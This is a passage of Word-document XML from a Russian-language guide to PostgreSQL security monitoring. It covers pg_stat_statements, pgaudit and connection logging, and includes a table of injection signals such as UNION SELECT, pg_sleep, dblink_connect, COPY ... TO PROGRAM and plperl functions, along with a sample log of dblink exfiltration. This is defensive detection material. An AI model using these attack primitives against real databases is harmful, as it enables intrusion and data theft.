          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rolname,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    LEFT(query, 120) AS query,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    calls,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    total_exec_time,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">FROM pg_stat_statements</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">JOIN pg_roles ON pg_roles.oid = userid</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ORDER BY total_exec_time DESC</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LIMIT 30;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сигналы инъекции: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Сигнал в pg_stat_statements</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="468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SELECT ... UNION SELECT ...</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от application-роли в точке, где UNION не ожидается</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 CAST($1 AS int)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> с rolename application, где CAST не из бизнес-логики</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SELECT pg_sleep($1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от application-роли</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SELECT dblink_connect($1)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от любой роли в production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EXTENSION</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от application-роли</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 (precursor)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COPY ... TO PROGRAM $1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FUNCTION ... LANGUAGE plperl</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от non-DBA</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WITH x AS (INSERT INTO ... RETURNING) SELECT</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> через SELECT-endpoint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string_agg($1, $2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> высокая частота от не-aggregate ролей</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R14 CVE-2023-5868</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array_append</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">array_cat</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от не-array ролей</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R13 CVE-2023-5869</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SET ROLE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> к привилегированной роли от application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format($1, $2)</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> от plpgsql-функций — audit, везде ли </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">%I</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3.16.1</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MERGE INTO ...</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b w:val="false"/>
                <w:bCs w:val="false"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> на RLS-protected tables в PG 15.0–15.3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SELECT ... FROM pg_stats_ext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R17 CVE-2024-4317</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_stat_statements.max = 5000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (или больше) в postgresql.conf — лимит на размер ringbuffer.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">pgaudit: per-class audit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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extension (рекомендуется ставить на любой production-кластер) даёт fine-grained control:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># postgresql.conf</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">shared_preload_libraries = 'pgaudit, pg_stat_statements, auto_explain'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgaudit.log = 'read, write, ddl, role, function, misc'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgaudit.log_catalog = off          # не аудитить pg_catalog reads (шумно)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgaudit.log_parameter = on         # включить значения параметров в log</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pgaudit.log_relation = on          # включить имена объектов</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Classes:</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READ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SELECT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COPY ... TO</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WRITE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INSERT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UPDATE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DELETE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TRUNCATE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COPY ... FROM</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FUNCTION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DO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, function-вызовы (отдельно от SELECT, который их вызвал).</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ROLE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GRANT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REVOKE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ALTER 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DROP ROLE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DDL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — все DDL.</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MISC</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DISCARD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FETCH</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CHECKPOINT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VACUUM</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Per-table audit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">-- Аудитировать READ только на critical-tables (а не на всю БД):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE app.payments SET (pgaudit.log = 'read, write');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER TABLE app.users SET (pgaudit.log = 'read, write');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Это снижает объём в 100x по сравнению с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_statement = all</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, но сохраняет покрытие критичного класса.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Per-role audit:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">ALTER ROLE app_role SET pgaudit.log = 'read, write, function';</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">log_connections / log_disconnections: 3.6 TCP-эксфильтрация</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">С </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">log_connections = on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> каждый connection-attempt пишется в log с startup-packet данных. Сигнал атаки 3.6.1 (dblink TCP-exfil) — необычные outbound connect-attempt-ы:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2026-05-26 10:23:45 [12345] connection received: host=10.0.0.5 port=42115</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="100" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">2026-05-26 10:23:45 [12345] connection authorized: user=4f8a7b6c5d4e database=secret_xyz application_name=</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Где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database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — base64/hex-encoded chunks данных, exfiltrated через 3.6.1 DNS/TCP-канал. Сравнить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user</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database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> с известным whitelist legitimate values; всё за пределами — alert.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain: plan-cache diagnostics (R8/R9)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> логирует explain plan для каждого запроса дольше </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain.log_min_duration</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shared_preload_libraries = 'auto_explain'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">auto_explain.log_min_duration = 1000   # 1 секунда — компромисс</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
